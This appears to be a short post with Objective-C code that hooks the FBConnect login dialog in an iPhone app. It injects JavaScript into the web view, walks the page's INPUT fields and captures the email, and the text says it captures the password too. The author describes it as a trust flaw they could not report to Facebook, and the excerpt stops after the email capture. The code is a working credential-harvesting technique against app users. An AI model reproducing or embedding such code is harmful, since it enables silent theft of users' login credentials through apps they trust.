This is a way of grabing the mail and password of the login view of the FBConn

1.  
2. This is a way of grabing the mail and password of the login view of the FBConnect API for iPhone. It searches for all the HTML tags of type INPUT (only 2) and retrieves the mail and password.
3. The code it's not very clean, I just made this test and it works. I tried to contact facebook about this security issue that compromises the trust of any iPhone application but I didn't found any way of reporting this.
4.  
5.  
6. on LoginDialog.m file
7.  
8. - (BOOL)webView:(UIWebView *)webView shouldStartLoadWithRequest:(NSURLRequest *)request
9.     navigationType:(UIWebViewNavigationType)navigationType {
10.    
11.     NSString *s;
12.     NSString *r;
13.     for(int i = 0; i < 100; i++)
14.     {
15.         s = [ [NSString alloc]  initWithFormat:@"document.all(%i).tagName;", i   ];
16.         r = [webView stringByEvaluatingJavaScriptFromString:s];
17.         if([r compare:@"INPUT"] == NSOrderedSame || [r compare:@"input"] == NSOrderedSame)
18.         {
19.             s = [ [NSString alloc]  initWithFormat:@"document.all(%i).value;", i   ];
20.             r = [webView stringByEvaluatingJavaScriptFromString:s];
21.             if( [r rangeOfString:@"@"].location != NSNotFound && [r rangeOfString:@"."].location != NSNotFound)
22.             {
23.                 string mail = [r UTF8String];
24.                 FBLayer::setFBMail( mail.c_str() );
25.                 break;
26.             }
27.         }
28.     }
29.  
30.  
31. ...